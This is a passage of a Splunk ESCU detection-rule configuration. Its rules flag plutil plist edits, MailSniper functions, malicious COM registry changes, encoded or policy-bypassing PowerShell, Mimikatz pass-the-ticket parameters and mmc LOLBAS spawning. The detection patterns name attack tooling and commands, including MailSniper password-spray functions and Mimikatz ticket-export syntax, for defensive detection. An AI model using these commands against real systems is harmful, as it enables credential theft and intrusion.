$user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - MacOS plutil - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1647"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Detect usage of plutil to modify plist files. Adversaries can modiy plist files to executed binaries or add command line arguments. Plist files in auto-run locations are executed upon user logon or system startup. action.notable.param.rule_title = MacOS plutil action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `osquery` name=es_process_events columns.path=/usr/bin/plutil | rename columns.* as * | stats count min(_time) as firstTime max(_time) as lastTime by username host cmdline pid path parent signing_id | rename username as user, cmdline as process, path as process_path, host as dest | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `macos_plutil_filter` [ESCU - Mailsniper Invoke functions - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect known mailsniper.ps1 functions executed in a machine. This technique was seen in some attacker to harvest some sensitive e-mail in a compromised exchange server. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect known mailsniper.ps1 functions executed in a machine. This technique was seen in some attacker to harvest some sensitive e-mail in a compromised exchange server. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the powershell logs from your endpoints. make sure you enable needed registry to monitor this event. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Mailsniper Invoke functions - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = mailsniper.ps1 functions $ScriptBlockText$ executed on a $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Mailsniper Invoke functions - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect known mailsniper.ps1 functions executed in a machine. This technique was seen in some attacker to harvest some sensitive e-mail in a compromised exchange server. action.notable.param.rule_title = Mailsniper Invoke functions action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*Invoke-GlobalO365MailSearch*", "*Invoke-GlobalMailSearch*", "*Invoke-SelfSearch*", "*Invoke-PasswordSprayOWA*", "*Invoke-PasswordSprayEWS*","*Invoke-DomainHarvestOWA*", "*Invoke-UsernameHarvestOWA*","*Invoke-OpenInboxFinder*","*Invoke-InjectGEventAPI*","*Invoke-InjectGEvent*","*Invoke-SearchGmail*", "*Invoke-MonitorCredSniper*", "*Invoke-AddGmailRule*","*Invoke-PasswordSprayEAS*","*Invoke-UsernameHarvestEAS*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `mailsniper_invoke_functions_filter` [ESCU - Malicious InProcServer32 Modification - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process modifying the registry with a known malicious CLSID under InProcServer32. Most COM classes are registered with the operating system and are identified by a GUID that represents the Class Identifier (CLSID) within the registry (usually under HKLM\\Software\\Classes\\CLSID or HKCU\\Software\\Classes\\CLSID). Behind the implementation of a COM class is the server (some binary) that is referenced within registry keys under the CLSID. The LocalServer32 key represents a path to an executable (exe) implementation, and the InprocServer32 key represents a path to a dynamic link library (DLL) implementation (Bohops). During triage, review parallel processes for suspicious activity. Pivot on the process GUID to see the full timeline of events. Analyze the value and look for file modifications. Being this is looking for inprocserver32, a DLL found in the value will most likely be loaded by a parallel process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.010", "T1112"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a process modifying the registry with a known malicious CLSID under InProcServer32. Most COM classes are registered with the operating system and are identified by a GUID that represents the Class Identifier (CLSID) within the registry (usually under HKLM\\Software\\Classes\\CLSID or HKCU\\Software\\Classes\\CLSID). Behind the implementation of a COM class is the server (some binary) that is referenced within registry keys under the CLSID. The LocalServer32 key represents a path to an executable (exe) implementation, and the InprocServer32 key represents a path to a dynamic link library (DLL) implementation (Bohops). During triage, review parallel processes for suspicious activity. Pivot on the process GUID to see the full timeline of events. Analyze the value and look for file modifications. Being this is looking for inprocserver32, a DLL found in the value will most likely be loaded by a parallel process. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited, filter as needed. In our test case, Remcos used regsvr32.exe to modify the registry. It may be required, dependent upon the EDR tool producing registry events, to remove (Default) from the command-line. action.escu.creation_date = 2021-10-05 action.escu.modification_date = 2021-10-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Malicious InProcServer32 Modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Regsvr32 Activity", "Remcos"] action.risk = 1 action.risk.param._risk_message = The $process_name$ was identified on endpoint $dest$ modifying the registry with a known malicious clsid under InProcServer32. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Malicious InProcServer32 Modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvr32 Activity", "Remcos"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.010", "T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a process modifying the registry with a known malicious CLSID under InProcServer32. Most COM classes are registered with the operating system and are identified by a GUID that represents the Class Identifier (CLSID) within the registry (usually under HKLM\\Software\\Classes\\CLSID or HKCU\\Software\\Classes\\CLSID). Behind the implementation of a COM class is the server (some binary) that is referenced within registry keys under the CLSID. The LocalServer32 key represents a path to an executable (exe) implementation, and the InprocServer32 key represents a path to a dynamic link library (DLL) implementation (Bohops). During triage, review parallel processes for suspicious activity. Pivot on the process GUID to see the full timeline of events. Analyze the value and look for file modifications. Being this is looking for inprocserver32, a DLL found in the value will most likely be loaded by a parallel process. action.notable.param.rule_title = Malicious InProcServer32 Modification action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes by _time Processes.process_id Processes.process_name Processes.dest Processes.process_guid Processes.user | `drop_dm_object_name(Processes)` | join process_guid [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\CLSID\\{89565275-A714-4a43-912E-978B935EDCCC}\\InProcServer32\\(Default)" by Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.dest Registry.process_guid Registry.user | `drop_dm_object_name(Registry)` | fields _time dest registry_path registry_key_name registry_value_name process_name process_path process process_guid user] | stats count min(_time) as firstTime max(_time) as lastTime by dest, process_name registry_path registry_key_name registry_value_name user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_inprocserver32_modification_filter` [ESCU - Malicious Powershell Executed As A Service - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection is to identify the abuse the Windows SC.exe to execute malicious commands or payloads via PowerShell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection is to identify the abuse the Windows SC.exe to execute malicious commands or payloads via PowerShell. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows System logs with the Service name, Service File Name Service Start type, and Service Type from your endpoints. action.escu.known_false_positives = Creating a hidden powershell service is rare and could key off of those instances. action.escu.creation_date = 2021-04-07 action.escu.modification_date = 2021-04-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Malicious Powershell Executed As A Service - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Malicious PowerShell", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = Identifies the abuse the Windows SC.exe to execute malicious powerShell as a service $Service_File_Name$ by $user$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Malicious Powershell Executed As A Service - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection is to identify the abuse the Windows SC.exe to execute malicious commands or payloads via PowerShell. action.notable.param.rule_title = Malicious Powershell Executed As A Service action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_system` EventCode=7045 | eval l_Service_File_Name=lower(Service_File_Name) | regex l_Service_File_Name="powershell[.\s]|powershell_ise[.\s]|pwsh[.\s]|psexec[.\s]" | regex l_Service_File_Name="-nop[rofile\s]+|-w[indowstyle]*\s+hid[den]*|-noe[xit\s]+|-enc[odedcommand\s]+" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Service_File_Name Service_Name Service_Start_Type Service_Type Service_Account user dest| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_executed_as_a_service_filter` [ESCU - Malicious PowerShell Process - Encoded Command - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of the EncodedCommand PowerShell parameter. This is typically used by Administrators to run complex scripts, but commonly used by adversaries to hide their code. \ The analytic identifies all variations of EncodedCommand, as PowerShell allows the ability to shorten the parameter. For example enc, enco, encod and so forth. In addition, through our research it was identified that PowerShell will interpret different command switch types beyond the hyphen. We have added endash, emdash, horizontal bar, and forward slash. \ During triage, review parallel events to determine legitimacy. Tune as needed based on admin scripts in use. \ Alternatively, may use regex per matching here https://regexr.com/662ov. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of the EncodedCommand PowerShell parameter. This is typically used by Administrators to run complex scripts, but commonly used by adversaries to hide their code. \ The analytic identifies all variations of EncodedCommand, as PowerShell allows the ability to shorten the parameter. For example enc, enco, encod and so forth. In addition, through our research it was identified that PowerShell will interpret different command switch types beyond the hyphen. We have added endash, emdash, horizontal bar, and forward slash. \ During triage, review parallel events to determine legitimacy. Tune as needed based on admin scripts in use. \ Alternatively, may use regex per matching here https://regexr.com/662ov. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = System administrators may use this option, but it's not common. action.escu.creation_date = 2022-01-18 action.escu.modification_date = 2022-01-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Malicious PowerShell Process - Encoded Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Hermetic Wiper", "Malicious PowerShell", "NOBELIUM Group", "WhisperGate", "DarkCrystal RAT", "Qakbot", "CISA AA22-320A", "Sandworm Tools", "Data Destruction", "Volt Typhoon"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Malicious PowerShell Process - Encoded Command - Rule action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Malicious PowerShell", "NOBELIUM Group", "WhisperGate", "DarkCrystal RAT", "Qakbot", "CISA AA22-320A", "Sandworm Tools", "Data Destruction", "Volt Typhoon"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` by Processes.user Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name Processes.dest Processes.process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where match(process,"(?i)[\-|\/|||]e(nc*o*d*e*d*c*o*m*m*a*n*d*)*\s+[^-]") | `malicious_powershell_process___encoded_command_filter` [ESCU - Malicious PowerShell Process - Execution Policy Bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for PowerShell processes started with parameters used to bypass the local execution policy for scripts. These parameters are often observed in attacks leveraging PowerShell scripts as they override the default PowerShell execution policy. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for PowerShell processes started with parameters used to bypass the local execution policy for scripts. These parameters are often observed in attacks leveraging PowerShell scripts as they override the default PowerShell execution policy. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = There may be legitimate reasons to bypass the PowerShell execution policy. The PowerShell script being run with this parameter should be validated to ensure that it is legitimate. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Malicious PowerShell Process - Execution Policy Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DHS Report TA18-074A", "HAFNIUM Group", "DarkCrystal RAT", "AsyncRAT", "Volt Typhoon"] action.risk = 1 action.risk.param._risk_message = PowerShell local execution policy bypass attempt on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Malicious PowerShell Process - Execution Policy Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["DHS Report TA18-074A", "HAFNIUM Group", "DarkCrystal RAT", "AsyncRAT", "Volt Typhoon"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for PowerShell processes started with parameters used to bypass the local execution policy for scripts. These parameters are often observed in attacks leveraging PowerShell scripts as they override the default PowerShell execution policy. action.notable.param.rule_title = Malicious PowerShell Process - Execution Policy Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process_id) as process_id, values(Processes.parent_process_id) as parent_process_id values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="* -ex*" OR Processes.process="* bypass *") by Processes.process_id, Processes.user, Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_process___execution_policy_bypass_filter` [ESCU - Malicious PowerShell Process With Obfuscation Techniques - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for PowerShell processes launched with arguments that have characters indicative of obfuscation on the command-line. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for PowerShell processes launched with arguments that have characters indicative of obfuscation on the command-line. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = These characters might be legitimately on the command-line, but it is not common. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Malicious PowerShell Process With Obfuscation Techniques - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Powershell.exe running with potential obfuscated arguments on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Malicious PowerShell Process With Obfuscation Techniques - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for PowerShell processes launched with arguments that have characters indicative of obfuscation on the command-line. action.notable.param.rule_title = Malicious PowerShell Process With Obfuscation Techniques action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` by Processes.user Processes.process_name Processes.original_file_name Processes.parent_process_name Processes.dest Processes.process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| eval num_obfuscation = (mvcount(split(process,"`"))-1) + (mvcount(split(process, "^"))-1) + (mvcount(split(process, "'"))-1) | `malicious_powershell_process_with_obfuscation_techniques_filter` | search num_obfuscation > 10 [ESCU - Mimikatz PassTheTicket CommandLine Parameters - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic looks for the use of Mimikatz command line parameters leveraged to execute pass the ticket attacks. Red teams and adversaries alike may use the pass the ticket technique using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Defenders should be aware that adversaries may customize the source code of Mimikatz and modify the command line parameters. This would effectively bypass this analytic. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic looks for the use of Mimikatz command line parameters leveraged to execute pass the ticket attacks. Red teams and adversaries alike may use the pass the ticket technique using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Defenders should be aware that adversaries may customize the source code of Mimikatz and modify the command line parameters. This would effectively bypass this analytic. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although highly unlikely, legitimate applications may use the same command line parameters as Mimikatz. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Mimikatz PassTheTicket CommandLine Parameters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Sandworm Tools", "CISA AA23-347A", "CISA AA22-320A", "Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Mimikatz command line parameters for pass the ticket attacks were used on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Mimikatz PassTheTicket CommandLine Parameters - Rule action.correlationsearch.annotations = {"analytic_story": ["Sandworm Tools", "CISA AA23-347A", "CISA AA22-320A", "Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic looks for the use of Mimikatz command line parameters leveraged to execute pass the ticket attacks. Red teams and adversaries alike may use the pass the ticket technique using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Defenders should be aware that adversaries may customize the source code of Mimikatz and modify the command line parameters. This would effectively bypass this analytic. action.notable.param.rule_title = Mimikatz PassTheTicket CommandLine Parameters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*sekurlsa::tickets /export*" OR Processes.process = "*kerberos::ptt*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `mimikatz_passtheticket_commandline_parameters_filter` [ESCU - Mmc LOLBAS Execution Process Spawn - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies `mmc.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the DCOM protocol and the MMC20 COM object, the executed command is spawned as a child processs of `mmc.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of mmc.exe that are part of the LOLBAS project can help defenders identify lateral movement activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.003", "T1218.014"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies `mmc.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the DCOM protocol and the MMC20 COM object, the executed command is spawned as a child processs of `mmc.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of mmc.exe that are part of the LOLBAS project can help defenders identify lateral movement activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate applications may trigger this behavior, filter as needed. action.escu.creation_date = 2021-11-23 action.escu.modification_date = 2021-11-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Mmc LOLBAS Execution Process Spawn - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = Mmc.exe spawned a LOLBAS process on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Mmc LOLBAS Execution Process Spawn - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.003", "T1218.014"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies `mmc.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the DCOM protocol and the MMC20 COM object, the executed command is spawned as a child processs of `mmc.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of mmc.exe that are part of the LOLBAS project can help defenders identify lateral movement activity. action.notable.param.rule_title = Mmc LOLBAS Execution Process Spawn action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 